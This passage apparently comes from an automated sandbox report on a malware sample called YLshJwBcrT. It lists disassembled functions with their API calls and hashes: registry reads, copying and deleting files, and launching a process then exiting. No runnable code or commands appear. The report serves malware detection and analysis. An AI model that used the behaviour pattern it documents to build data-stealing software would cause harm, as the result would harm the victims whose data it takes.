                                  • RegQueryValueExA.ADVAPI32(022F7920,00420AAC,00000000,00000000,?,000000FF), ref: 022F79E1
                                  • RegCloseKey.ADVAPI32(022F7920), ref: 022F79EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction ID: 9f149a9607a88dc5d162e52cf35de991a2837788ad5084777602d06450776d22
                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction Fuzzy Hash: 0401FFB9A80308BFEB10DFE4DD4AFAEB7B9EB48701F104559FA05A7284D67596008F52
                                  Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0088A4E0,?,?,?,0041140C,?,0088A4E0,00000000), ref: 0041926C
                                  • lstrcpyn.KERNEL32(0064AB88,0088A4E0,0088A4E0,?,0041140C,?,0088A4E0), ref: 00419290
                                  • lstrlenA.KERNEL32(?,?,0041140C,?,0088A4E0), ref: 004192A7
                                  • wsprintfA.USER32 ref: 004192C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                  Function 022E1507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                                  • RegCloseKey.ADVAPI32(?), ref: 022E1566
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction ID: 1941fffdd0fdb456d5666f97491d347a127cb04a2569af42e171ea8f319d9346
                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction Fuzzy Hash: 340131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0697280D6749A018F91
                                  Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3466090806-0
                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                  Function 022FC9A9 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 022FC9B5
                                    • Part of subcall function 022FC206: __getptd_noexit.LIBCMT ref: 022FC209
                                    • Part of subcall function 022FC206: __amsg_exit.LIBCMT ref: 022FC216
                                  • __getptd.LIBCMT ref: 022FC9CC
                                  • __amsg_exit.LIBCMT ref: 022FC9DA
                                  • __lock.LIBCMT ref: 022FC9EA
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 022FC9FE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                  • Instruction ID: 166f3ce7acbbe414f0968888a1cc0f23de872fab370fd008bec44d23ddf93d86
                                  • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                  • Instruction Fuzzy Hash: 4EF0BB329603199BD7F0FBE8950276DF3A1AF04728F10013BDA14A72D8DBA55540DF5D
                                  Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 0041C74E
                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                  • __getptd.LIBCMT ref: 0041C765
                                  • __amsg_exit.LIBCMT ref: 0041C773
                                  • __lock.LIBCMT ref: 0041C783
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                  • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                  • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                  • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                  Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                  Download Yara Rule
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,00883630), ref: 0041079A
                                  • StrCmpCA.SHLWAPI(00000000,00883620), ref: 00410866
                                  • StrCmpCA.SHLWAPI(00000000,008835B0), ref: 0041099D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: `_A
                                  • API String ID: 3722407311-2339250863
                                  • Opcode ID: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                  • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                  • Opcode Fuzzy Hash: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                  • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                  Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON
                                  Download Yara Rule
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,00883630), ref: 0041079A
                                  • StrCmpCA.SHLWAPI(00000000,00883620), ref: 00410866
                                  • StrCmpCA.SHLWAPI(00000000,008835B0), ref: 0041099D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: `_A
                                  • API String ID: 3722407311-2339250863
                                  • Opcode ID: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                  • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                  • Opcode Fuzzy Hash: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                  • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                  Function 022F6897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022F68CA
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 022F698D
                                  • ExitProcess.KERNEL32 ref: 022F69BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                  • Instruction ID: a497d63774b96b45848fc12dd20ea59b412fa38e5baa543e264ef2daa43bde68
                                  • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                  • Instruction Fuzzy Hash: D63144B5810308ABDB54EFD0CD95FDEB77AAF04300F4041A8E309A2194DB746B88CF59
                                  Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                  • ExitProcess.KERNEL32 ref: 00416755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                  • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                  • Opcode Fuzzy Hash: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                  • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                  Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID: @Jn@$Jn@$Jn@
                                  • API String ID: 544645111-1180188686
                                  • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                  • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                  • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                  • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                  Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                  • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpy
                                  • String ID: vI@$vI@
                                  • API String ID: 3905823039-1245421781
                                  • Opcode ID: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                  • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                  • Opcode Fuzzy Hash: fdbee14e0802cf6b2965d2f6b2dd0298cd0a1d0021e9d1410a9323d4b8571ec6
                                  • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                  Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                  • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                  • wsprintfW.USER32 ref: 00418D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 659108358-2783943728
                                  • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                  • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                  • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                  • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                  Function 022EA4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EA548
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 022EA666
                                  • lstrlen.KERNEL32(00000000), ref: 022EA923
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                                  • DeleteFileA.KERNEL32(00000000), ref: 022EA9AA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                  • String ID:
                                  • API String ID: 257331557-0
                                  • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                  • Instruction ID: 66f77940b23073e5b8f163c018d07ff7b1b205f51a9e2381ab5119a804011f84
                                  • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                  • Instruction Fuzzy Hash: 4DE1D0729203189BCB55EBE4DD91DEEF33AAF24700F508169E21A72194EF346A4CCF61
                                  Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008855F0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                  • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                  • String ID:
                                  • API String ID: 257331557-0
                                  • Opcode ID: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                  • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                  • Opcode Fuzzy Hash: 187ffd4c9462aa23556ef9b5443141304392004e6ff5cea6192e155308f1c96e
                                  • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                  Function 022ED667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ED6E8
                                  • lstrlen.KERNEL32(00000000), ref: 022ED8FF
                                  • lstrlen.KERNEL32(00000000), ref: 022ED913
                                  • DeleteFileA.KERNEL32(00000000), ref: 022ED992
                                  Memory Dump Source
